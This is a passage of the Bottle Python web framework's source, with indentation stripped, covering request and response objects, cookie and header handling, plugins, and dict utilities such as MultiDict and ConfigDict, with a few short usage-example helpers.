if not buff:
buff = read(min(maxread, bufsize))
part, buff = buff[:maxread], buff[maxread:]
if not part: raise err
yield part
maxread -= len(part)
if read(2) != rn:
raise err
@DictProperty('environ', 'bottle.request.body', read_only=True)
def _body(self):
body_iter = self._iter_chunked if self.chunked else self._iter_body
read_func = self.environ['wsgi.input'].read
body, body_size, is_temp_file = BytesIO(), 0, False
for part in body_iter(read_func, self.MEMFILE_MAX):
body.write(part)
body_size += len(part)
if not is_temp_file and body_size > self.MEMFILE_MAX:
body, tmp = TemporaryFile(mode='w+b'), body
body.write(tmp.getvalue())
del tmp
is_temp_file = True
self.environ['wsgi.input'] = body
body.seek(0)
return body
def _get_body_string(self):
''' read body until content-length or MEMFILE_MAX into a string. Raise
            HTTPError(413) on requests that are too large. '''
clen = self.content_length
if clen > self.MEMFILE_MAX:
            raise HTTPError(413, 'Request too large')
if clen < 0: clen = self.MEMFILE_MAX + 1
data = self.body.read(clen)
if len(data) > self.MEMFILE_MAX: # Fail fast
            raise HTTPError(413, 'Request too large')
return data
@property
def body(self):
""" The HTTP request body as a seek-able file-like object. Depending on
:attr:`MEMFILE_MAX`, this is either a temporary file or a
:class:`io.BytesIO` instance. Accessing this property for the first
time reads and replaces the ``wsgi.input`` environ variable.
Subsequent accesses just do a `seek(0)` on the file object. """
self._body.seek(0)
return self._body
@property
def chunked(self):
        ''' True if Chunked transfer encoding was used. '''
return 'chunked' in self.environ.get('HTTP_TRANSFER_ENCODING', '').lower()
#: An alias for :attr:`query`.
GET = query
@DictProperty('environ', 'bottle.request.post', read_only=True)
def POST(self):
""" The values of :attr:`forms` and :attr:`files` combined into a single
:class:`FormsDict`. Values are either strings (form values) or
instances of :class:`cgi.FieldStorage` (file uploads).
"""
post = FormsDict()
# We default to application/x-www-form-urlencoded for everything that
# is not multipart and take the fast path (also: 3.1 workaround)
if not self.content_type.startswith('multipart/'):
pairs = _parse_qsl(tonat(self._get_body_string(), 'latin1'))
for key, value in pairs:
post[key] = value
return post
safe_env = {'QUERY_STRING':''} # Build a safe environment for cgi
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
if key in self.environ: safe_env[key] = self.environ[key]
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
if py31:
args['fp'] = NCTextIOWrapper(args['fp'], encoding='utf8',
newline='\n')
elif py3k:
args['encoding'] = 'utf8'
data = cgi.FieldStorage(**args)
self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394#msg207958
data = data.list or []
for item in data:
if item.filename:
post[item.name] = FileUpload(item.file, item.name,
item.filename, item.headers)
else:
post[item.name] = item.value
return post
@property
def url(self):
""" The full request URI including hostname and scheme. If your app
lives behind a reverse proxy or load balancer and you get confusing
results, make sure that the ``X-Forwarded-Host`` header is set
correctly. """
return self.urlparts.geturl()
@DictProperty('environ', 'bottle.request.urlparts', read_only=True)
def urlparts(self):
''' The :attr:`url` string as an :class:`urlparse.SplitResult` tuple.
The tuple contains (scheme, host, path, query_string and fragment),
but the fragment is always empty because it is not visible to the
server. '''
env = self.environ
http = env.get('HTTP_X_FORWARDED_PROTO') or env.get('wsgi.url_scheme', 'http')
host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST')
if not host:
# HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients.
host = env.get('SERVER_NAME', '127.0.0.1')
port = env.get('SERVER_PORT')
if port and port != ('80' if http == 'http' else '443'):
host += ':' + port
path = urlquote(self.fullpath)
return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '')
@property
def fullpath(self):
""" Request path including :attr:`script_name` (if present). """
return urljoin(self.script_name, self.path.lstrip('/'))
@property
def query_string(self):
""" The raw :attr:`query` part of the URL (everything in between ``?``
and ``#``) as a string. """
return self.environ.get('QUERY_STRING', '')
@property
def script_name(self):
''' The initial portion of the URL's `path` that was removed by a higher
level (server or routing middleware) before the application was
            called. This script path is returned with leading and trailing
slashes. '''
script_name = self.environ.get('SCRIPT_NAME', '').strip('/')
return '/' + script_name + '/' if script_name else '/'
def path_shift(self, shift=1):
''' Shift path segments from :attr:`path` to :attr:`script_name` and
vice versa.
:param shift: The number of path segments to shift. May be negative
to change the shift direction. (default: 1)
'''
script = self.environ.get('SCRIPT_NAME','/')
self['SCRIPT_NAME'], self['PATH_INFO'] = path_shift(script, self.path, shift)
@property
def content_length(self):
        ''' The request body length as an integer. The client is responsible for
            setting this header. Otherwise, the real length of the body is unknown
and -1 is returned. In this case, :attr:`body` will be empty. '''
return int(self.environ.get('CONTENT_LENGTH') or -1)
@property
def content_type(self):
''' The Content-Type header as a lowercase-string (default: empty). '''
return self.environ.get('CONTENT_TYPE', '').lower()
@property
def is_xhr(self):
        ''' True if the request was triggered by an XMLHttpRequest. This only
works with JavaScript libraries that support the `X-Requested-With`
header (most of the popular libraries do). '''
requested_with = self.environ.get('HTTP_X_REQUESTED_WITH','')
return requested_with.lower() == 'xmlhttprequest'
@property
def is_ajax(self):
''' Alias for :attr:`is_xhr`. "Ajax" is not the right term. '''
return self.is_xhr
@property
def auth(self):
""" HTTP authentication data as a (user, password) tuple. This
implementation currently supports basic (not digest) authentication
only. If the authentication happened at a higher level (e.g. in the
front web-server or a middleware), the password field is None, but
the user field is looked up from the ``REMOTE_USER`` environ
variable. On any errors, None is returned. """
basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION',''))
if basic: return basic
ruser = self.environ.get('REMOTE_USER')
if ruser: return (ruser, None)
return None
@property
def remote_route(self):
""" A list of all IPs that were involved in this request, starting with
            the client IP and followed by zero or more proxies. This only
            works if all proxies support the ``X-Forwarded-For`` header. Note
that this information can be forged by malicious clients. """
proxy = self.environ.get('HTTP_X_FORWARDED_FOR')
if proxy: return [ip.strip() for ip in proxy.split(',')]
remote = self.environ.get('REMOTE_ADDR')
return [remote] if remote else []
@property
def remote_addr(self):
""" The client IP as a string. Note that this information can be forged
by malicious clients. """
route = self.remote_route
return route[0] if route else None
def copy(self):
""" Return a new :class:`Request` with a shallow :attr:`environ` copy. """
return Request(self.environ.copy())
def get(self, value, default=None): return self.environ.get(value, default)
def __getitem__(self, key): return self.environ[key]
def __delitem__(self, key): self[key] = ""; del(self.environ[key])
def __iter__(self): return iter(self.environ)
def __len__(self): return len(self.environ)
def keys(self): return self.environ.keys()
def __setitem__(self, key, value):
""" Change an environ value and clear all caches that depend on it. """
if self.environ.get('bottle.request.readonly'):
raise KeyError('The environ dictionary is read-only.')
self.environ[key] = value
todelete = ()
if key == 'wsgi.input':
todelete = ('body', 'forms', 'files', 'params', 'post', 'json')
elif key == 'QUERY_STRING':
todelete = ('query', 'params')
elif key.startswith('HTTP_'):
todelete = ('headers', 'cookies')
for key in todelete:
self.environ.pop('bottle.request.'+key, None)
def __repr__(self):
return '<%s: %s %s>' % (self.__class__.__name__, self.method, self.url)
def __getattr__(self, name):
''' Search in self.environ for additional user defined attributes. '''
try:
var = self.environ['bottle.request.ext.%s'%name]
return var.__get__(self) if hasattr(var, '__get__') else var
except KeyError:
raise AttributeError('Attribute %r not defined.' % name)
def __setattr__(self, name, value):
if name == 'environ': return object.__setattr__(self, name, value)
self.environ['bottle.request.ext.%s'%name] = value
def _hkey(key):
if '\n' in key or '\r' in key or '\0' in key:
raise ValueError("Header names must not contain control characters: %r" % key)
return key.title().replace('_', '-')
def _hval(value):
value = tonat(value)
if '\n' in value or '\r' in value or '\0' in value:
raise ValueError("Header value must not contain control characters: %r" % value)
return value
class HeaderProperty(object):
def __init__(self, name, reader=None, writer=None, default=''):
self.name, self.default = name, default
self.reader, self.writer = reader, writer
self.__doc__ = 'Current value of the %r header.' % name.title()
def __get__(self, obj, cls):
if obj is None: return self
value = obj.get_header(self.name, self.default)
return self.reader(value) if self.reader else value
def __set__(self, obj, value):
obj[self.name] = self.writer(value) if self.writer else value
def __delete__(self, obj):
del obj[self.name]
class BaseResponse(object):
""" Storage class for a response body as well as headers and cookies.
This class does support dict-like case-insensitive item-access to
headers, but is NOT a dict. Most notably, iterating over a response
yields parts of the body and not the headers.
:param body: The response body as one of the supported types.
:param status: Either an HTTP status code (e.g. 200) or a status line
including the reason phrase (e.g. '200 OK').
:param headers: A dictionary or a list of name-value pairs.
Additional keyword arguments are added to the list of headers.
Underscores in the header name are replaced with dashes.
"""
default_status = 200
default_content_type = 'text/html; charset=UTF-8'
# Header blacklist for specific response codes
# (rfc2616 section 10.2.3 and 10.3.5)
bad_headers = {
204: set(('Content-Type',)),
304: set(('Allow', 'Content-Encoding', 'Content-Language',
'Content-Length', 'Content-Range', 'Content-Type',
'Content-Md5', 'Last-Modified'))}
def __init__(self, body='', status=None, headers=None, **more_headers):
self._cookies = None
self._headers = {}
self.body = body
self.status = status or self.default_status
if headers:
if isinstance(headers, dict):
headers = headers.items()
for name, value in headers:
self.add_header(name, value)
if more_headers:
for name, value in more_headers.items():
self.add_header(name, value)
def copy(self, cls=None):
''' Returns a copy of self. '''
cls = cls or BaseResponse
assert issubclass(cls, BaseResponse)
copy = cls()
copy.status = self.status
copy._headers = dict((k, v[:]) for (k, v) in self._headers.items())
if self._cookies:
copy._cookies = SimpleCookie()
copy._cookies.load(self._cookies.output(header=''))
return copy
def __iter__(self):
return iter(self.body)
def close(self):
if hasattr(self.body, 'close'):
self.body.close()
@property
def status_line(self):
''' The HTTP status line as a string (e.g. ``404 Not Found``).'''
return self._status_line
@property
def status_code(self):
''' The HTTP status code as an integer (e.g. 404).'''
return self._status_code
def _set_status(self, status):
if isinstance(status, int):
code, status = status, _HTTP_STATUS_LINES.get(status)
elif ' ' in status:
status = status.strip()
code = int(status.split()[0])
else:
raise ValueError('String status line without a reason phrase.')
if not 100 <= code <= 999: raise ValueError('Status code out of range.')
self._status_code = code
self._status_line = str(status or ('%d Unknown' % code))
def _get_status(self):
return self._status_line
status = property(_get_status, _set_status, None,
''' A writeable property to change the HTTP response status. It accepts
either a numeric code (100-999) or a string with a custom reason
phrase (e.g. "404 Brain not found"). Both :data:`status_line` and
:data:`status_code` are updated accordingly. The return value is
always a status string. ''')
del _get_status, _set_status
@property
def headers(self):
''' An instance of :class:`HeaderDict`, a case-insensitive dict-like
view on the response headers. '''
hdict = HeaderDict()
hdict.dict = self._headers
return hdict
def __contains__(self, name): return _hkey(name) in self._headers
def __delitem__(self, name): del self._headers[_hkey(name)]
def __getitem__(self, name): return self._headers[_hkey(name)][-1]
def __setitem__(self, name, value): self._headers[_hkey(name)] = [_hval(value)]
def get_header(self, name, default=None):
''' Return the value of a previously defined header. If there is no
header with that name, return a default value. '''
return self._headers.get(_hkey(name), [default])[-1]
def set_header(self, name, value):
''' Create a new response header, replacing any previously defined
headers with the same name. '''
self._headers[_hkey(name)] = [_hval(value)]
def add_header(self, name, value):
''' Add an additional response header, not removing duplicates. '''
self._headers.setdefault(_hkey(name), []).append(_hval(value))
def iter_headers(self):
''' Yield (header, value) tuples, skipping headers that are not
allowed with the current response status code. '''
return self.headerlist
@property
def headerlist(self):
""" WSGI conform list of (header, value) tuples. """
out = []
headers = list(self._headers.items())
if 'Content-Type' not in self._headers:
headers.append(('Content-Type', [self.default_content_type]))
if self._status_code in self.bad_headers:
bad_headers = self.bad_headers[self._status_code]
headers = [h for h in headers if h[0] not in bad_headers]
out += [(name, val) for (name, vals) in headers for val in vals]
if self._cookies:
for c in self._cookies.values():
out.append(('Set-Cookie', _hval(c.OutputString())))
if py3k:
out = [(k, v.encode('utf8').decode('latin1')) for (k, v) in out]
return out
content_type = HeaderProperty('Content-Type')
content_length = HeaderProperty('Content-Length', reader=int)
expires = HeaderProperty('Expires',
reader=lambda x: datetime.utcfromtimestamp(parse_date(x)),
writer=lambda x: http_date(x))
@property
def charset(self, default='UTF-8'):
""" Return the charset specified in the content-type header (default: utf8). """
if 'charset=' in self.content_type:
return self.content_type.split('charset=')[-1].split(';')[0].strip()
return default
def set_cookie(self, name, value, secret=None, **options):
''' Create a new cookie or replace an old one. If the `secret` parameter is
set, create a `Signed Cookie` (described below).
:param name: the name of the cookie.
:param value: the value of the cookie.
:param secret: a signature key required for signed cookies.
Additionally, this method accepts all RFC 2109 attributes that are
supported by :class:`cookie.Morsel`, including:
:param max_age: maximum age in seconds. (default: None)
:param expires: a datetime object or UNIX timestamp. (default: None)
:param domain: the domain that is allowed to read the cookie.
(default: current domain)
:param path: limits the cookie to a given path (default: current path)
:param secure: limit the cookie to HTTPS connections (default: off).
            :param httponly: prevents client-side JavaScript from reading this cookie
(default: off, requires Python 2.6 or newer).
If neither `expires` nor `max_age` is set (default), the cookie will
expire at the end of the browser session (as soon as the browser
window is closed).
Signed cookies may store any pickle-able object and are
cryptographically signed to prevent manipulation. Keep in mind that
cookies are limited to 4kb in most browsers.
Warning: Signed cookies are not encrypted (the client can still see
the content) and not copy-protected (the client can restore an old
cookie). The main intention is to make pickling and unpickling
              safe, not to store secret information at the client side.
'''
if not self._cookies:
self._cookies = SimpleCookie()
if secret:
value = touni(cookie_encode((name, value), secret))
elif not isinstance(value, basestring):
raise TypeError('Secret key missing for non-string Cookie.')
        if len(value) > 4096: raise ValueError('Cookie value too long.')
self._cookies[name] = value
for key, value in options.items():
if key == 'max_age':
if isinstance(value, timedelta):
value = value.seconds + value.days * 24 * 3600
if key == 'expires':
if isinstance(value, (datedate, datetime)):
value = value.timetuple()
elif isinstance(value, (int, float)):
value = time.gmtime(value)
value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value)
self._cookies[name][key.replace('_', '-')] = value
def delete_cookie(self, key, **kwargs):
''' Delete a cookie. Be sure to use the same `domain` and `path`
settings as used to create the cookie. '''
kwargs['max_age'] = -1
kwargs['expires'] = 0
self.set_cookie(key, '', **kwargs)
def __repr__(self):
out = ''
for name, value in self.headerlist:
out += '%s: %s\n' % (name.title(), value.strip())
return out
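# Illustrative usage sketch for BaseResponse; the header name, cookie name and
# secret below are hypothetical examples.
def _example_response_usage():
    res = BaseResponse(body='ok', status=200)
    res.set_header('X-Example', 'demo')              # replaces any previous value
    res.set_cookie('session', 'token', secret='s3')  # signed cookie (see set_cookie)
    return res.headerlist                            # WSGI (name, value) pairs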
def local_property(name=None):
if name: depr('local_property() is deprecated and will be removed.') #0.12
ls = threading.local()
def fget(self):
try: return ls.var
except AttributeError:
raise RuntimeError("Request context not initialized.")
def fset(self, value): ls.var = value
def fdel(self): del ls.var
return property(fget, fset, fdel, 'Thread-local property')
class LocalRequest(BaseRequest):
''' A thread-local subclass of :class:`BaseRequest` with a different
set of attributes for each thread. There is usually only one global
instance of this class (:data:`request`). If accessed during a
request/response cycle, this instance always refers to the *current*
request (even on a multithreaded server). '''
bind = BaseRequest.__init__
environ = local_property()
class LocalResponse(BaseResponse):
''' A thread-local subclass of :class:`BaseResponse` with a different
set of attributes for each thread. There is usually only one global
instance of this class (:data:`response`). Its attributes are used
to build the HTTP response at the end of the request/response cycle.
'''
bind = BaseResponse.__init__
_status_line = local_property()
_status_code = local_property()
_cookies = local_property()
_headers = local_property()
body = local_property()
Request = BaseRequest
Response = BaseResponse
class HTTPResponse(Response, BottleException):
def __init__(self, body='', status=None, headers=None, **more_headers):
super(HTTPResponse, self).__init__(body, status, headers, **more_headers)
def apply(self, response):
response._status_code = self._status_code
response._status_line = self._status_line
response._headers = self._headers
response._cookies = self._cookies
response.body = self.body
class HTTPError(HTTPResponse):
default_status = 500
def __init__(self, status=None, body=None, exception=None, traceback=None,
**options):
self.exception = exception
self.traceback = traceback
super(HTTPError, self).__init__(body, status, **options)
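# Illustrative sketch: HTTPError is both a response and an exception, so a
# route callback can raise it to stop processing. Status and message are
# hypothetical.
def _example_http_error(user):
    if user is None:
        raise HTTPError(401, 'Authentication required')
    return 'welcome back, %s' % user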
###############################################################################
# Plugins ######################################################################
###############################################################################
class PluginError(BottleException): pass
class JSONPlugin(object):
name = 'json'
api = 2
def __init__(self, json_dumps=json_dumps):
self.json_dumps = json_dumps
def apply(self, callback, route):
dumps = self.json_dumps
if not dumps: return callback
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
except HTTPError:
rv = _e()
if isinstance(rv, dict):
                # Attempt to serialize; raises an exception on failure
json_response = dumps(rv)
                # Set content type only if serialization was successful
response.content_type = 'application/json'
return json_response
elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
rv.body = dumps(rv.body)
rv.content_type = 'application/json'
return rv
return wrapper
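# Illustrative sketch: with the default JSONPlugin installed, returning a dict
# from a callback produces an ``application/json`` response. The route and
# payload are hypothetical.
def _example_json_route(app):
    @app.route('/status')
    def status():
        return {'ok': True, 'workers': 4}   # serialized by JSONPlugin
    return app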
class TemplatePlugin(object):
''' This plugin applies the :func:`view` decorator to all routes with a
`template` config parameter. If the parameter is a tuple, the second
element must be a dict with additional options (e.g. `template_engine`)
or default variables for the template. '''
name = 'template'
api = 2
def apply(self, callback, route):
conf = route.config.get('template')
if isinstance(conf, (tuple, list)) and len(conf) == 2:
return view(conf[0], **conf[1])(callback)
elif isinstance(conf, str):
return view(conf)(callback)
else:
return callback
#: Not a plugin, but part of the plugin API. TODO: Find a better place.
class _ImportRedirect(object):
def __init__(self, name, impmask):
''' Create a virtual package that redirects imports (see PEP 302). '''
self.name = name
self.impmask = impmask
self.module = sys.modules.setdefault(name, new_module(name))
self.module.__dict__.update({'__file__': __file__, '__path__': [],
'__all__': [], '__loader__': self})
sys.meta_path.append(self)
def find_module(self, fullname, path=None):
if '.' not in fullname: return
packname = fullname.rsplit('.', 1)[0]
if packname != self.name: return
return self
def load_module(self, fullname):
if fullname in sys.modules: return sys.modules[fullname]
modname = fullname.rsplit('.', 1)[1]
realname = self.impmask % modname
__import__(realname)
module = sys.modules[fullname] = sys.modules[realname]
setattr(self.module, modname, module)
module.__loader__ = self
return module
###############################################################################
# Common Utilities #############################################################
###############################################################################
class MultiDict(DictMixin):
""" This dict stores multiple values per key, but behaves exactly like a
normal dict in that it returns only the newest value for any given key.
There are special methods available to access the full list of values.
"""
def __init__(self, *a, **k):
self.dict = dict((k, [v]) for (k, v) in dict(*a, **k).items())
def __len__(self): return len(self.dict)
def __iter__(self): return iter(self.dict)
def __contains__(self, key): return key in self.dict
def __delitem__(self, key): del self.dict[key]
def __getitem__(self, key): return self.dict[key][-1]
def __setitem__(self, key, value): self.append(key, value)
def keys(self): return self.dict.keys()
if py3k:
def values(self): return (v[-1] for v in self.dict.values())
def items(self): return ((k, v[-1]) for k, v in self.dict.items())
def allitems(self):
return ((k, v) for k, vl in self.dict.items() for v in vl)
iterkeys = keys
itervalues = values
iteritems = items
iterallitems = allitems
else:
def values(self): return [v[-1] for v in self.dict.values()]
def items(self): return [(k, v[-1]) for k, v in self.dict.items()]
def iterkeys(self): return self.dict.iterkeys()
def itervalues(self): return (v[-1] for v in self.dict.itervalues())
def iteritems(self):
return ((k, v[-1]) for k, v in self.dict.iteritems())
def iterallitems(self):
return ((k, v) for k, vl in self.dict.iteritems() for v in vl)
def allitems(self):
return [(k, v) for k, vl in self.dict.iteritems() for v in vl]
def get(self, key, default=None, index=-1, type=None):
''' Return the most recent value for a key.
:param default: The default value to be returned if the key is not
present or the type conversion fails.
:param index: An index for the list of available values.
:param type: If defined, this callable is used to cast the value
               into a specific type. Exceptions are suppressed and result in
               the default value being returned.
'''
try:
val = self.dict[key][index]
return type(val) if type else val
except Exception:
pass
return default
def append(self, key, value):
''' Add a new value to the list of values for this key. '''
self.dict.setdefault(key, []).append(value)
def replace(self, key, value):
''' Replace the list of values with a single value. '''
self.dict[key] = [value]
def getall(self, key):
''' Return a (possibly empty) list of values for a key. '''
return self.dict.get(key) or []
#: Aliases for WTForms to mimic other multi-dict APIs (Django)
getone = get
getlist = getall
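# Illustrative sketch of MultiDict semantics: plain item access returns the
# newest value, while getall() exposes the full list. Keys are hypothetical.
def _example_multidict():
    md = MultiDict()
    md['tag'] = 'a'
    md.append('tag', 'b')
    assert md['tag'] == 'b'
    assert md.getall('tag') == ['a', 'b']
    return md.get('missing', default=0, type=int)   # type cast with fallback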
class FormsDict(MultiDict):
''' This :class:`MultiDict` subclass is used to store request form data.
Additionally to the normal dict-like item access methods (which return
unmodified data as native strings), this container also supports
attribute-like access to its values. Attributes are automatically de-
or recoded to match :attr:`input_encoding` (default: 'utf8'). Missing
attributes default to an empty string. '''
#: Encoding used for attribute values.
input_encoding = 'utf8'
#: If true (default), unicode strings are first encoded with `latin1`
#: and then decoded to match :attr:`input_encoding`.
recode_unicode = True
def _fix(self, s, encoding=None):
if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI
return s.encode('latin1').decode(encoding or self.input_encoding)
elif isinstance(s, bytes): # Python 2 WSGI
return s.decode(encoding or self.input_encoding)
else:
return s
def decode(self, encoding=None):
''' Returns a copy with all keys and values de- or recoded to match
:attr:`input_encoding`. Some libraries (e.g. WTForms) want a
unicode dictionary. '''
copy = FormsDict()
enc = copy.input_encoding = encoding or self.input_encoding
copy.recode_unicode = False
for key, value in self.allitems():
copy.append(self._fix(key, enc), self._fix(value, enc))
return copy
def getunicode(self, name, default=None, encoding=None):
''' Return the value as a unicode string, or the default. '''
try:
return self._fix(self[name], encoding)
except (UnicodeError, KeyError):
return default
def __getattr__(self, name, default=unicode()):
# Without this guard, pickle generates a cryptic TypeError:
if name.startswith('__') and name.endswith('__'):
return super(FormsDict, self).__getattr__(name)
return self.getunicode(name, default=default)
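# Illustrative sketch of FormsDict attribute access: missing keys yield an
# empty string instead of raising. The key name is hypothetical.
def _example_formsdict():
    form = FormsDict()
    form['name'] = 'alice'
    assert form.name == 'alice'     # attribute-style access
    assert form.missing == ''       # missing attributes default to u''
    return form.getunicode('name')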
class HeaderDict(MultiDict):
""" A case-insensitive version of :class:`MultiDict` that defaults to
replace the old value instead of appending it. """
def __init__(self, *a, **ka):
self.dict = {}
if a or ka: self.update(*a, **ka)
def __contains__(self, key): return _hkey(key) in self.dict
def __delitem__(self, key): del self.dict[_hkey(key)]
def __getitem__(self, key): return self.dict[_hkey(key)][-1]
def __setitem__(self, key, value): self.dict[_hkey(key)] = [_hval(value)]
def append(self, key, value): self.dict.setdefault(_hkey(key), []).append(_hval(value))
def replace(self, key, value): self.dict[_hkey(key)] = [_hval(value)]
def getall(self, key): return self.dict.get(_hkey(key)) or []
def get(self, key, default=None, index=-1):
return MultiDict.get(self, _hkey(key), default, index)
def filter(self, names):
for name in (_hkey(n) for n in names):
if name in self.dict:
del self.dict[name]
class WSGIHeaderDict(DictMixin):
''' This dict-like class wraps a WSGI environ dict and provides convenient
access to HTTP_* fields. Keys and values are native strings
(2.x bytes or 3.x unicode) and keys are case-insensitive. If the WSGI
environment contains non-native string values, these are de- or encoded
using a lossless 'latin1' character set.
The API will remain stable even on changes to the relevant PEPs.
Currently PEP 333, 444 and 3333 are supported. (PEP 444 is the only one
that uses non-native strings.)
'''
#: List of keys that do not have a ``HTTP_`` prefix.
cgikeys = ('CONTENT_TYPE', 'CONTENT_LENGTH')
def __init__(self, environ):
self.environ = environ
def _ekey(self, key):
''' Translate header field name to CGI/WSGI environ key. '''
key = key.replace('-','_').upper()
if key in self.cgikeys:
return key
return 'HTTP_' + key
def raw(self, key, default=None):
''' Return the header value as is (may be bytes or unicode). '''
return self.environ.get(self._ekey(key), default)
def __getitem__(self, key):
return tonat(self.environ[self._ekey(key)], 'latin1')
def __setitem__(self, key, value):
raise TypeError("%s is read-only." % self.__class__)
def __delitem__(self, key):
raise TypeError("%s is read-only." % self.__class__)
def __iter__(self):
for key in self.environ:
if key[:5] == 'HTTP_':
yield key[5:].replace('_', '-').title()
elif key in self.cgikeys:
yield key.replace('_', '-').title()
def keys(self): return [x for x in self]
def __len__(self): return len(self.keys())
def __contains__(self, key): return self._ekey(key) in self.environ
class ConfigDict(dict):
''' A dict-like configuration storage with additional support for
namespaces, validators, meta-data, on_change listeners and more.
This storage is optimized for fast read access. Retrieving a key
or using non-altering dict methods (e.g. `dict.get()`) has no overhead
compared to a native dict.
'''
__slots__ = ('_meta', '_on_change')
class Namespace(DictMixin):
def __init__(self, config, namespace):
self._config = config
self._prefix = namespace
def __getitem__(self, key):
depr('Accessing namespaces as dicts is discouraged. '
'Only use flat item access: '
'cfg["names"]["pace"]["key"] -> cfg["name.space.key"]') #0.12
return self._config[self._prefix + '.' + key]
def __setitem__(self, key, value):
self._config[self._prefix + '.' + key] = value
def __delitem__(self, key):
del self._config[self._prefix + '.' + key]
def __iter__(self):
ns_prefix = self._prefix + '.'
for key in self._config:
ns, dot, name = key.rpartition('.')
if ns == self._prefix and name:
yield name
def keys(self): return [x for x in self]
def __len__(self): return len(self.keys())
def __contains__(self, key): return self._prefix + '.' + key in self._config
def __repr__(self): return '<Config.Namespace %s.*>' % self._prefix
def __str__(self): return '<Config.Namespace %s.*>' % self._prefix
# Deprecated ConfigDict features
def __getattr__(self, key):
depr('Attribute access is deprecated.') #0.12
if key not in self and key[0].isupper():
self[key] = ConfigDict.Namespace(self._config, self._prefix + '.' + key)
if key not in self and key.startswith('__'):
raise AttributeError(key)
return self.get(key)
def __setattr__(self, key, value):
if key in ('_config', '_prefix'):
self.__dict__[key] = value
return
depr('Attribute assignment is deprecated.') #0.12
if hasattr(DictMixin, key):
raise AttributeError('Read-only attribute.')
if key in self and self[key] and isinstance(self[key], self.__class__):
raise AttributeError('Non-empty namespace attribute.')
self[key] = value
def __delattr__(self, key):
if key in self:
val = self.pop(key)
if isinstance(val, self.__class__):
prefix = key + '.'
for key in self:
if key.startswith(prefix):
del self[prefix+key]
def __call__(self, *a, **ka):
depr('Calling ConfDict is deprecated. Use the update() method.') #0.12
self.update(*a, **ka)
return self
def __init__(self, *a, **ka):
self._meta = {}
self._on_change = lambda name, value: None
if a or ka:
depr('Constructor does no longer accept parameters.') #0.12
self.update(*a, **ka)
def load_config(self, filename):
''' Load values from an *.ini style config file.
If the config file contains sections, their names are used as
namespaces for the values within. The two special sections
``DEFAULT`` and ``bottle`` refer to the root namespace (no prefix).
'''
conf = ConfigParser()
conf.read(filename)
for section in conf.sections():
for key, value in conf.items(section):
if section not in ('DEFAULT', 'bottle'):
key = section + '.' + key
self[key] = value
return self
def load_dict(self, source, namespace='', make_namespaces=False):
''' Import values from a dictionary structure. Nesting can be used to
represent namespaces.
>>> ConfigDict().load_dict({'name': {'space': {'key': 'value'}}})
{'name.space.key': 'value'}
'''
stack = [(namespace, source)]
while stack:
prefix, source = stack.pop()
if not isinstance(source, dict):
                raise TypeError('Source is not a dict (%r)' % type(source))
for key, value in source.items():
if not isinstance(key, basestring):
raise TypeError('Key is not a string (%r)' % type(key))
full_key = prefix + '.' + key if prefix else key
if isinstance(value, dict):
stack.append((full_key, value))
if make_namespaces:
self[full_key] = self.Namespace(self, full_key)
else:
self[full_key] = value
return self
def update(self, *a, **ka):
''' If the first parameter is a string, all keys are prefixed with this
namespace. Apart from that it works just as the usual dict.update().
Example: ``update('some.namespace', key='value')`` '''
prefix = ''
if a and isinstance(a[0], basestring):
prefix = a[0].strip('.') + '.'
a = a[1:]
for key, value in dict(*a, **ka).items():
self[prefix+key] = value
def setdefault(self, key, value):
if key not in self:
self[key] = value
return self[key]
def __setitem__(self, key, value):
if not isinstance(key, basestring):
raise TypeError('Key has type %r (not a string)' % type(key))
value = self.meta_get(key, 'filter', lambda x: x)(value)
if key in self and self[key] is value:
return
self._on_change(key, value)
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
def clear(self):
for key in self:
del self[key]
def meta_get(self, key, metafield, default=None):
''' Return the value of a meta field for a key. '''
return self._meta.get(key, {}).get(metafield, default)
def meta_set(self, key, metafield, value):
''' Set the meta field for a key to a new value. This triggers the
on-change handler for existing keys. '''
self._meta.setdefault(key, {})[metafield] = value
if key in self:
self[key] = self[key]
def meta_list(self, key):
''' Return an iterable of meta field names defined for a key. '''
return self._meta.get(key, {}).keys()
# Deprecated ConfigDict features
def __getattr__(self, key):
depr('Attribute access is deprecated.') #0.12
if key not in self and key[0].isupper():
self[key] = self.Namespace(self, key)
if key not in self and key.startswith('__'):
raise AttributeError(key)
return self.get(key)
def __setattr__(self, key, value):
if key in self.__slots__:
return dict.__setattr__(self, key, value)
depr('Attribute assignment is deprecated.') #0.12
if hasattr(dict, key):
raise AttributeError('Read-only attribute.')
if key in self and self[key] and isinstance(self[key], self.Namespace):
raise AttributeError('Non-empty namespace attribute.')
self[key] = value
def __delattr__(self, key):
if key in self:
val = self.pop(key)
if isinstance(val, self.Namespace):
prefix = key + '.'
for key in self:
if key.startswith(prefix):
del self[prefix+key]
def __call__(self, *a, **ka):
depr('Calling ConfDict is deprecated. Use the update() method.') #0.12
self.update(*a, **ka)
return self
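# Illustrative sketch of ConfigDict: nested dicts are flattened to dotted keys
# and update() accepts a namespace prefix. The keys shown are hypothetical.
def _example_configdict():
    cfg = ConfigDict()
    cfg.load_dict({'db': {'host': 'localhost', 'port': 5432}})
    cfg.update('app', debug=True)
    assert cfg['db.host'] == 'localhost'
    assert cfg['app.debug'] is True
    return cfg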
class AppStack(list):
""" A stack-like list. Calling it returns the head of the stack. """
def __call__(self):
""" Return the current default application. """
return self[-1]
def push(self, value=None):
""" Add a new :class:`Bottle` instance to the stack """
if not isinstance(value, Bottle):
value = Bottle()
self.append(value)
return value
class WSGIFileWrapper(object):
def __init__(self, fp, buffer_size=1024*64):
self.fp, self.buffer_size = fp, buffer_size
for attr in ('fileno', 'close', 'read', 'readlines', 'tell', 'seek'):
if hasattr(fp, attr): setattr(self, attr, getattr(fp, attr))
def __iter__(self):
buff, read = self.buffer_size, self.read
while True:
part = read(buff)
if not part: return
yield part
class _closeiter(object):
''' This only exists to be able to attach a .close method to iterators that
do not support attribute assignment (most of itertools). '''
def __init__(self, iterator, close=None):
self.iterator = iterator
